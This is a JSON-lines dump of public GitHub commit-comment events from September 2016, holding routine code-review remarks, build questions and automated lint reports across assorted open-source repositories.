{"id":"4534988881","type":"CommitCommentEvent","actor":{"login":"dannyjung90"},"repo":{"name":"ccle/moodle-mod_questionnaire"},"payload":{"comment":{"id":18947473,"position":9,"line":63,"path":"db/access.php","commit_id":"14eb86aa6cdca91f9c8aec37ee0d7224d1c80be9","created_at":"2016-09-08T16:00:20Z","updated_at":"2016-09-08T16:00:20Z","body":"@creator23 The period at the end of the START and END comments are not necessary. Same for the rest of them."}},"created_at":"2016-09-08T16:00:20Z"}
{"id":"4534992022","type":"CommitCommentEvent","actor":{"login":"kalaivananmit"},"repo":{"name":"kalaivananmit/customerservice-app"},"payload":{"comment":{"id":18947481,"position":null,"line":null,"path":null,"commit_id":"f5400072fd154f928c4ec6675ac4f29022b392e3","created_at":"2016-09-08T16:00:48Z","updated_at":"2016-09-08T16:00:48Z","body":"This is a simple customer service web app which i am creating in my free time.The UI stack is developed using MVC ,HTML5,CSS,Jquery"}},"created_at":"2016-09-08T16:00:48Z"}
{"id":"4534992056","type":"CommitCommentEvent","actor":{"login":"tobine"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18947482,"position":141,"line":14080,"path":"tests/layer_validation_tests.cpp","commit_id":"7dfc26bc43179b0aa7adfd74e97ef6353b7b9600","created_at":"2016-09-08T16:00:48Z","updated_at":"2016-09-08T16:00:48Z","body":"The addition of this line is causing the test to crash on Nexus Player.\r\n@MarkMLunarG do you have a Nexus Player you can verify the crash and debug?"}},"created_at":"2016-09-08T16:00:48Z"}
{"id":"4534992497","type":"CommitCommentEvent","actor":{"login":"pdeboer"},"repo":{"name":"CCI-MIT/XCoLab"},"payload":{"comment":{"id":18947483,"position":4,"line":76,"path":"portlets/staffmembers-portlet/src/main/java/org/xcolab/portlets/staffmembers/StaffMemberWrapper.java","commit_id":"61151714b42fafb75222c735c33e38eba6172de6","created_at":"2016-09-08T16:00:53Z","updated_at":"2016-09-08T16:00:53Z","body":"why does this return a String? Could be a Long"}},"created_at":"2016-09-08T16:00:53Z"}
{"id":"4534995064","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18947494,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T16:01:18Z","updated_at":"2016-09-08T16:01:18Z","body":"UDP3:\r\n\r\nВ итоге попробовал\r\n```ruby\r\ndef show_stations\r\n\t\t\t@Route.full_route.select{|station| @trains_on_station[self.Train]}\r\n\tend\r\n```\r\n\r\nНе прокатило. :("}},"created_at":"2016-09-08T16:01:18Z"}
{"id":"4534995314","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18947495,"position":2,"line":33,"path":"api/src/main/resources/org/openmrs/api/db/hibernate/Cohort.hbm.xml","commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-08T16:01:20Z","updated_at":"2016-09-08T16:01:20Z","body":"You need to add a new members field which is a collection and it's the one you need to map to the cohort_member table, you can keep memberIds for backwards compatibility but it should call getMembers() and returns their ids"}},"created_at":"2016-09-08T16:01:20Z"}
{"id":"4534998374","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"vsimko/rroad"},"payload":{"comment":{"id":18947506,"position":null,"line":null,"path":null,"commit_id":"ca2921285f213592f9c1a6f605912d3091321b99","created_at":"2016-09-08T16:01:47Z","updated_at":"2016-09-08T16:01:47Z","body":"[R/iri.R:22:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​  CalculateIRIperSegmentsOverlapping(profile, iri_coef, segment.length, segment.length)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:45:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​CalculateIRIperSegmentsOverlapping <- function(profile, iri_coef, segment.length = 100, segment.offset = 20) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:51:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L51) *style:* **lines should not be more than 80 characters.**\n```r\n​  K <- max(2, as.integer(.5 + .25 / DX) + 1)  # number of profile points used to compute mvg avg slope input (window)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:52:3:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L52) *warning:* **local variable ‘BL’ assigned but may not be used**\n```r\n​  BL <- (K - 1) * DX  # baselength\n  ^~\n```\n[R/iri.R:54:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​  # split profile into segments by defining starting and ending indices (e.g. per 100m segment considering offsets)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:58:19:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L58) *style:* **Commas should always have a space after.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                  ^\n```\n[R/iri.R:58:34:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                ~^~\n```\n[R/iri.R:58:53:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L58) *style:* **Commas should always have a space after.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                                    ^\n```\n[R/iri.R:58:55:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                                     ~^~\n```\n[R/iri.R:59:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L59) *style:* **lines should not be more than 80 characters.**\n```r\n​  # if there is exactly one sample missing for calculating initial IRI for next segment, delete last segment\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:60:7:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L60) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n      ^\n```\n[R/iri.R:60:23:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n                     ~^~\n```\n[R/iri.R:60:41:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n                                       ~^~\n```\n[R/iri.R:63:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:63:37:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L63) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                    ^\n```\n[R/iri.R:63:61:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                           ~^~\n```\n[R/iri.R:63:85:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                   ~^~\n```\n[R/iri.R:63:87:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                     ~^~\n```\n[R/iri.R:63:107:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L63) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                                          ^\n```\n[R/iri.R:108:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L108) *style:* **lines should not be more than 80 characters.**\n```r\n​  K <- max(2, as.integer(.5 + .25 / DX) + 1)  # number of profile points used to compute mvg avg slope input (window)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:116:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L116) *style:* **lines should not be more than 80 characters.**\n```r\n​  # sliding window of profil elevations for calculating mvg avg slope (buffer of length K)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:129:3:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L129) *warning:* **local variable ‘iri_df’ assigned but may not be used**\n```r\n​  iri_df <- data.frame()  # df for colleteing return values\n  ^~~~~~\n```\n[R/iri.R:152:10:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L152) *style:* **Put spaces around all infix operators.**\n```r\n​      y[j-1] <- y[j]\n        ~^~\n```\n[R/iri.R:160:29:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L160) *style:* **Commas should always have a space after.**\n```r\n​        z[j] <- z[j] + ST[j,jj] * z_last[jj]\n                            ^\n```\n[R/iri.R:163:24:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L163) *style:* **Put spaces around all infix operators.**\n```r\n​    rs <- rs + abs(z[1]- z[3])\n                      ~^\n```\n[R/iri.R:168:1:](https://github.com/vsimko/rroad/blob/ca2921285f213592f9c1a6f605912d3091321b99/R/iri.R#L168) *style:* **lines should not be more than 80 characters.**\n```r\n​    # determine avg rs by dividing by number of considered samples and attach to result vector\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-08T16:01:47Z"}
{"id":"4534998756","type":"CommitCommentEvent","actor":{"login":"vokins"},"repo":{"name":"vokins/yhosts"},"payload":{"comment":{"id":18947508,"position":null,"line":null,"path":null,"commit_id":"7445e35d4ebaaf12562e862bf1907432074a2990","created_at":"2016-09-08T16:01:51Z","updated_at":"2016-09-08T16:01:51Z","body":"clr"}},"created_at":"2016-09-08T16:01:51Z"}
{"id":"4535002204","type":"CommitCommentEvent","actor":{"login":"dannyjung90"},"repo":{"name":"ccle/moodle-mod_questionnaire"},"payload":{"comment":{"id":18947518,"position":17,"line":2985,"path":"questionnaire.class.php","commit_id":"14eb86aa6cdca91f9c8aec37ee0d7224d1c80be9","created_at":"2016-09-08T16:02:25Z","updated_at":"2016-09-08T16:02:25Z","body":"@creator23 Unnecessary line removal."}},"created_at":"2016-09-08T16:02:25Z"}
{"id":"4535003350","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947520,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:02:41Z","updated_at":"2016-09-08T16:02:41Z","body":"I have not reached java build step. I build the boot image first by ```make bootimage``` that why I reached ``file_contexts``` step."}},"created_at":"2016-09-08T16:02:41Z"}
{"id":"4535005731","type":"CommitCommentEvent","actor":{"login":"jgravois"},"repo":{"name":"ynunokawa/L.esri.WebMap"},"payload":{"comment":{"id":18947527,"position":null,"line":null,"path":null,"commit_id":"c351f900dcaf4b9ff04ebcd0d320c26b6704bf83","created_at":"2016-09-08T16:02:58Z","updated_at":"2016-09-08T16:02:58Z","body":":tada:"}},"created_at":"2016-09-08T16:02:58Z"}
{"id":"4535007727","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947532,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:03:16Z","updated_at":"2016-09-08T16:03:16Z","body":"oh ok\r\naosp booted btw?"}},"created_at":"2016-09-08T16:03:16Z"}
{"id":"4535010173","type":"CommitCommentEvent","actor":{"login":"joeltine"},"repo":{"name":"google/closure-library"},"payload":{"comment":{"id":18947537,"position":null,"line":null,"path":null,"commit_id":"7a02682360d1f3f79c807d0e3088a985fef4235c","created_at":"2016-09-08T16:03:37Z","updated_at":"2016-09-08T16:03:37Z","body":"It's actually a GWT compiled version of JS Compiler. We use it to transpile ES6 on the fly in the browser and (potentially) in NodeJS."}},"created_at":"2016-09-08T16:03:37Z"}
{"id":"4535015106","type":"CommitCommentEvent","actor":{"login":"spurin"},"repo":{"name":"KleinerNull/xmldataset"},"payload":{"comment":{"id":18947550,"position":null,"line":null,"path":null,"commit_id":"9561cb673ae45476396314e515f134eb8cde65c2","created_at":"2016-09-08T16:04:25Z","updated_at":"2016-09-08T16:04:25Z","body":"Hey KleinerNull,\r\n\r\nGood to hear from you again :-)  I welcome these changes, please feel free to continue, if you can raise merge requests for the various changes, I'll implement.  I will also come back to you regarding our other conversation.\r\n\r\n- James"}},"created_at":"2016-09-08T16:04:25Z"}
{"id":"4535016244","type":"CommitCommentEvent","actor":{"login":"gsanchietti"},"repo":{"name":"gsanchietti/nethserver-firewall-base"},"payload":{"comment":{"id":18947553,"position":4,"line":19,"path":"root/etc/e-smith/templates/etc/shorewall/rules/10base50related","commit_id":"c772c96733160e8428ca1c821c516e88537a8ca3","created_at":"2016-09-08T16:04:35Z","updated_at":"2016-09-08T16:04:35Z","body":"I'm not sure this is really needed.\r\n"}},"created_at":"2016-09-08T16:04:35Z"}
{"id":"4535016806","type":"CommitCommentEvent","actor":{"login":"l2fprod"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":18947556,"position":1,"line":1,"path":"src/routes/Dashboard/PopUpCard/modules/PopUpCard.js","commit_id":"522ad0440911c95b738b6b566f8c0ba3ad1fc9e2","created_at":"2016-09-08T16:04:40Z","updated_at":"2016-09-08T16:04:40Z","body":"is this file really needed?"}},"created_at":"2016-09-08T16:04:40Z"}
{"id":"4535018180","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18947558,"position":null,"line":null,"path":null,"commit_id":"396ffac28f948ebe4864551c67a01d1828e22ba6","created_at":"2016-09-08T16:04:53Z","updated_at":"2016-09-08T16:04:53Z","body":"Shouldn't this go into `master` as well?"}},"created_at":"2016-09-08T16:04:53Z"}
{"id":"4535020801","type":"CommitCommentEvent","actor":{"login":"l2fprod"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":18947564,"position":9,"line":9,"path":"src/routes/Dashboard/components/PopUpCard/PopUpCard.story.js","commit_id":"522ad0440911c95b738b6b566f8c0ba3ad1fc9e2","created_at":"2016-09-08T16:05:19Z","updated_at":"2016-09-08T16:05:19Z","body":"looks like the \"params\" do not match the props the PopUpCard expects"}},"created_at":"2016-09-08T16:05:19Z"}
{"id":"4535020996","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18947565,"position":74,"line":94,"path":"algebra/group_constructions.hlean","commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T16:05:20Z","updated_at":"2016-09-08T16:05:20Z","body":"Yes, I guess we'll also need that. \r\nI don't think it works in your exact example, since the underlying types are different for these two groups: `G ≃ G` and `G ≃g G`. Of course we can indeed define a subgroup of `G ≃ G` consisting of all group isomorphisms, and that subgroup will be equivalent to `G ≃g G`"}},"created_at":"2016-09-08T16:05:20Z"}
{"id":"4535022359","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18947570,"position":18,"line":18,"path":"api/src/main/resources/org/openmrs/api/db/hibernate/CohortMember.hbm.xml","commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-08T16:05:33Z","updated_at":"2016-09-08T16:05:33Z","body":"You need to add a separet primary key column i.e cohort_member_id so that cohort_id stays as the FK to the cohort table"}},"created_at":"2016-09-08T16:05:33Z"}
{"id":"4535024829","type":"CommitCommentEvent","actor":{"login":"dannyjung90"},"repo":{"name":"ccle/moodle-mod_questionnaire"},"payload":{"comment":{"id":18947577,"position":null,"line":null,"path":null,"commit_id":"14eb86aa6cdca91f9c8aec37ee0d7224d1c80be9","created_at":"2016-09-08T16:05:57Z","updated_at":"2016-09-08T16:05:57Z","body":"@creator23 As with the other ticket, you might need to add a dash between the ticket number and the ticket description depending on if Rex prefers it one way or another.\r\n\r\nhttps://ccle.ucla.edu/mod/wiki/view.php?id=3276"}},"created_at":"2016-09-08T16:05:57Z"}
{"id":"4535025812","type":"CommitCommentEvent","actor":{"login":"hokb"},"repo":{"name":"HDFGroup/HDF.PInvoke"},"payload":{"comment":{"id":18947578,"position":null,"line":null,"path":null,"commit_id":"080a488e8637da526258fe9b4f4c7aa56a40df33","created_at":"2016-09-08T16:06:08Z","updated_at":"2016-09-08T16:06:08Z","body":"Nice! Looks good. Will take a deeper look after finishing reviewing [this somehow related topic](http://ilnumerics.net/hdf5-unicode-strings.html)."}},"created_at":"2016-09-08T16:06:08Z"}
{"id":"4535027518","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947580,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:06:24Z","updated_at":"2016-09-08T16:06:24Z","body":"Yes, basic functions is working properly. But the libMali.so just crashed when the screen is off (issue #78 )."}},"created_at":"2016-09-08T16:06:24Z"}
{"id":"4535029046","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18947586,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-08T16:06:39Z","updated_at":"2016-09-08T16:06:39Z","body":"Alex, everything keeps getting moved out of my H drive, so I CAN'T TEST IT AT SCHOOL!\r\nUGGGGH!"}},"created_at":"2016-09-08T16:06:39Z"}
{"id":"4535029499","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18947588,"position":22,"line":22,"path":"api/src/main/java/org/openmrs/CohortMember.java","commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-08T16:06:43Z","updated_at":"2016-09-08T16:06:43Z","body":"You need to add a cohortMemberId field and then update getId() and setId() to return this"}},"created_at":"2016-09-08T16:06:43Z"}
{"id":"4535032234","type":"CommitCommentEvent","actor":{"login":"Grazfather"},"repo":{"name":"hugsy/gef"},"payload":{"comment":{"id":18947600,"position":23,"line":849,"path":"gef.py","commit_id":"d6971d5e8b803e52246e530e07aee61a019f707e","created_at":"2016-09-08T16:07:11Z","updated_at":"2016-09-08T16:07:11Z","body":"both `_gef_disassemble_top` and `_gef_disassemble_around` return lists, so this test shouldn't be needed. The `for line in lines` will be skipped over and `result` will be returned as is."}},"created_at":"2016-09-08T16:07:11Z"}
{"id":"4535032789","type":"CommitCommentEvent","actor":{"login":"l2fprod"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":18947604,"position":1,"line":1,"path":"src/routes/Dashboard/components/Dashboard.jsx","commit_id":"522ad0440911c95b738b6b566f8c0ba3ad1fc9e2","created_at":"2016-09-08T16:07:17Z","updated_at":"2016-09-08T16:07:17Z","body":"these changes in Dashboard will likely trigger conflicts and are not really needed right now. The storybook for the PopUpCard should be enough to integrate the component later on in the map."}},"created_at":"2016-09-08T16:07:17Z"}
{"id":"4535035070","type":"CommitCommentEvent","actor":{"login":"dennisroczek"},"repo":{"name":"mozilla/mediawiki-bugzilla"},"payload":{"comment":{"id":18947608,"position":41,"line":75,"path":"templates/bug/table.tpl","commit_id":"193b35813d9403ba544be4cd3eb9daf77dbade89","created_at":"2016-09-08T16:07:39Z","updated_at":"2016-09-08T16:07:39Z","body":"simply redo a pr. otherwise nobody will do it. :-("}},"created_at":"2016-09-08T16:07:39Z"}
{"id":"4535035283","type":"CommitCommentEvent","actor":{"login":"broady"},"repo":{"name":"GoogleCloudPlatform/go-endpoints"},"payload":{"comment":{"id":18947610,"position":null,"line":null,"path":null,"commit_id":"eb61a125f865cdaa3f708ec5b9fba0e290c59115","created_at":"2016-09-08T16:07:41Z","updated_at":"2016-09-08T16:07:41Z","body":"Discussion at issue 111."}},"created_at":"2016-09-08T16:07:41Z"}
{"id":"4535036809","type":"CommitCommentEvent","actor":{"login":"acmcelwee"},"repo":{"name":"spredfast/lucene-solr"},"payload":{"comment":{"id":18947616,"position":7,"line":157,"path":"lucene/analysis/common/src/java/org/apache/lucene/analysis/miscellaneous/WordDelimiterFilter.java","commit_id":"4ec1e76f2d893ebf9eaaa6500438d4135be2b874","created_at":"2016-09-08T16:07:57Z","updated_at":"2016-09-08T16:07:57Z","body":"👍 "}},"created_at":"2016-09-08T16:07:57Z"}
{"id":"4535039167","type":"CommitCommentEvent","actor":{"login":"Grazfather"},"repo":{"name":"hugsy/gef"},"payload":{"comment":{"id":18947622,"position":null,"line":null,"path":null,"commit_id":"3c1c67264ac947ae44c0c98fead4fd94ab85ad5b","created_at":"2016-09-08T16:08:22Z","updated_at":"2016-09-08T16:08:22Z","body":":tada:"}},"created_at":"2016-09-08T16:08:22Z"}
{"id":"4535041710","type":"CommitCommentEvent","actor":{"login":"DanNetwalker"},"repo":{"name":"Vazkii/BotaniaV2"},"payload":{"comment":{"id":18947628,"position":null,"line":null,"path":null,"commit_id":"dd92eaf8860c54851ad4a45072411f87eda6628f","created_at":"2016-09-08T16:08:46Z","updated_at":"2016-09-08T16:08:46Z","body":"Wait wut? No passive flowers?\r\n\r\n...oh. O-OOH! \r\nI think I see where you are going... xDDD"}},"created_at":"2016-09-08T16:08:46Z"}
{"id":"4535043814","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947632,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:09:08Z","updated_at":"2016-09-08T16:09:08Z","body":"Thank you :)"}},"created_at":"2016-09-08T16:09:08Z"}
{"id":"4535044400","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":18947635,"position":null,"line":null,"path":null,"commit_id":"0814f63615615f966f1c2c92732658b3a726ad1b","created_at":"2016-09-08T16:09:14Z","updated_at":"2016-09-08T16:09:14Z","body":"For the user who does not code, there is no change."}},"created_at":"2016-09-08T16:09:14Z"}
{"id":"4535044662","type":"CommitCommentEvent","actor":{"login":"jvojtushjrwge"},"repo":{"name":"jvojtushjrwge/Hello-World"},"payload":{"comment":{"id":18947636,"position":3,"line":3,"path":"README.md","commit_id":"652b58179bb04896c1c939ad1292b26fef6f90ff","created_at":"2016-09-08T16:09:16Z","updated_at":"2016-09-08T16:09:16Z","body":"Test Sample"}},"created_at":"2016-09-08T16:09:16Z"}
{"id":"4535045552","type":"CommitCommentEvent","actor":{"login":"nicksuch"},"repo":{"name":"Upper-Polo/todo_list"},"payload":{"comment":{"id":18947638,"position":null,"line":null,"path":null,"commit_id":"57f7b8647bf116fb33473f4b2ce8e46c3d70cce8","created_at":"2016-09-08T16:09:24Z","updated_at":"2016-09-08T16:09:24Z","body":"See #5 "}},"created_at":"2016-09-08T16:09:24Z"}
{"id":"4535045622","type":"CommitCommentEvent","actor":{"login":"jvojtushjrwge"},"repo":{"name":"jvojtushjrwge/Hello-World"},"payload":{"comment":{"id":18947640,"position":2,"line":2,"path":"README.md","commit_id":"652b58179bb04896c1c939ad1292b26fef6f90ff","created_at":"2016-09-08T16:09:25Z","updated_at":"2016-09-08T16:09:25Z","body":"Test Comment 2\r\n"}},"created_at":"2016-09-08T16:09:25Z"}
{"id":"4535048491","type":"CommitCommentEvent","actor":{"login":"dennisroczek"},"repo":{"name":"mozilla/mediawiki-bugzilla"},"payload":{"comment":{"id":18947645,"position":41,"line":75,"path":"templates/bug/table.tpl","commit_id":"193b35813d9403ba544be4cd3eb9daf77dbade89","created_at":"2016-09-08T16:09:52Z","updated_at":"2016-09-08T16:09:52Z","body":"simply redo a pr. otherwise nobody will do it. :-("}},"created_at":"2016-09-08T16:09:52Z"}
{"id":"4535054225","type":"CommitCommentEvent","actor":{"login":"Grazfather"},"repo":{"name":"hugsy/gef"},"payload":{"comment":{"id":18947660,"position":5,"line":4944,"path":"gef.py","commit_id":"357530861731e84511fdefbb4e30efef83193ea4","created_at":"2016-09-08T16:10:50Z","updated_at":"2016-09-08T16:10:50Z","body":"Not sure if intentional: Now the PW line has one less space than both before and after lines."}},"created_at":"2016-09-08T16:10:50Z"}
{"id":"4535054903","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18947661,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-08T16:10:58Z","updated_at":"2016-09-08T16:10:58Z","body":"Where is the liquibase changeset that adds the cohort_member table?"}},"created_at":"2016-09-08T16:10:58Z"}
{"id":"4535058259","type":"CommitCommentEvent","actor":{"login":"tamiko"},"repo":{"name":"dealii/dealii"},"payload":{"comment":{"id":18947674,"position":17,"line":70,"path":"source/distributed/tria_base.cc","commit_id":"4123a86394191ff82681e5c8935245179c28415f","created_at":"2016-09-08T16:11:30Z","updated_at":"2016-09-08T16:11:30Z","body":"This change breaks non-MPI setups. @tjhei @bangerth *ping*"}},"created_at":"2016-09-08T16:11:30Z"}
{"id":"4535058981","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18947675,"position":null,"line":null,"path":null,"commit_id":"310962ea05dfbf5f29bcf5ad6d2f04de68c34e2d","created_at":"2016-09-08T16:11:37Z","updated_at":"2016-09-08T16:11:37Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/38/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:174:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:222:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:303:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-08T16:11:37Z"}
